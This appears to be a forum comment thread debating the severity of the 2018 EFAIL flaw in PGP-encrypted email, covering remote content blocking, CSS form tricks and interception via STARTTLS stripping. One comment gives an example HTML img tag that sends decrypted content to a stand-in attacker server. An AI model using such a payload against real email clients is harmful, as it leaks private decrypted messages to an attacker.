5 ms·
A lot of buzz for a not so critical vulnerability. Well it is critical but very hard to exploit because : 1. Hacker need to intercept the encrypted email. 2. H
by noguespi 8y ago
A lot of buzz for a not so critical vulnerability. Well it is critical but very hard to exploit because :
1. Hacker need to intercept the encrypted email.
2. HTML tags/remote content are blocked by default on most email client.
Still an important vulnerability, but not enough (for me) to disable enigmail, I know I'm safe with blocked remote content.
By the way I hate this kind of "buzz" disclosure. Just disclose fully or wait.
- middleclick 8y ago> I know I'm safe with blocked remote content. Curious, how?
- noguespi 8y agoBecause the vulnerability is just about adding HTML tags which will send decrypted content to a remote server controlled by attacker. Example : <img hxxp://hacker-server.com/--ENCRYPED CONTENT HERE-- If you disable remote content, it can't be exploited on thunderbird (which is disabled by default) BUT there may be other attack vector on other software/email client. Anyway, the attacker still need to get a hand on your encrypted email.
- dbrgn 8y agoWhat about attack vectors like this one (from the paper)? For example, in Thunderbird and Postbox we can completely redress the UI with CSS and trick the user into submitting the plaintext with an HTML form if he clicks somewhere into the message. That sounds like something that can easily happen, even with remote content disabled. (Edit: Formatting)
- middleclick 8y agoWouldn't disabling HTML email take care of this?
- dbrgn 8y agoYes, but that's probably something most people won't do (with the prevalence of HTML email and no plaintext alternative). Also, it was a reply to the parent who stated "If you disable remote content, it can't be exploited on thunderbird". Ruling out the presence of an exfiltration channel is hard. It's better to prevent rendering of messages with invalid authentication code in the first place (and not rendering it and showing a warning).
- jcranmer 8y agoThe HTML form submission vector has been fixed in Thunderbird.
- cortesoft 8y ago> Anyway, the attacker still need to get a hand on your encrypted email. That is the case for all encryption vulnerabilities, and it seems a little strange that you keep pointing this out. Of COURSE the attackers need access to the encrypted text; the entire point of encryption is because we want to protect our data when someone else has access to it. If we thought an attacker getting their hands on our encrypted email was not something to worry about, we wouldn't encrypt our emails at all. Why do you keep making that point?
- jowsie 8y agoBecause the method used relies on accessing remote content.
- tlogan 8y agoThe problem is that decrypting software will do: "Here's the message and some 'extra stuff'". Now, this 'extra stuff' might not be HTML, might be something which might trigger something else. I really do not know but some smart guy might figure out how to exploit that part. Or might not.
- tptacek 8y agoEncrypted mail that only works when attackers can't intercept your mail might just as well not be encrypted.
- noguespi 8y agoYou won't be able to decrypt email just by intercepting them
- JoachimSchipper 8y agoIt's not exactly PGP's security model, but: - if you use SMTP-via-TLS and (IMAP/POP/MAPI)-via-TLS, attackers really can't intercept your mail - unauthenticated encryption still protects your mail spool at rest. Of course, attackers gaining access to your mailbox is still game over, due to password resets etc. via e-mail; but "attackers can't intercept your mail" is a more realistic assumption in 2018 than it was when PGP was designed.
- wodny 8y agoNot necessarily. Mail can be intercepted when transferred between MTAs which seem to be often vulnerable to STARTTLS stripping due to a fallback mechanism. See "Neither Snow Nor Rain Nor MITM... An Empirical Analysis of Email Delivery Security"[1]. [1]: https://conferences.sigcomm.org/imc/2015/papers/p27.pdf https://conferences.sigcomm.org/imc/2015/papers/p27.pdf
- spacenick88 8y agoAlso in many (sensible) configurations the PGP key will be locked when not reading encrypted mails and will need a fresh password entry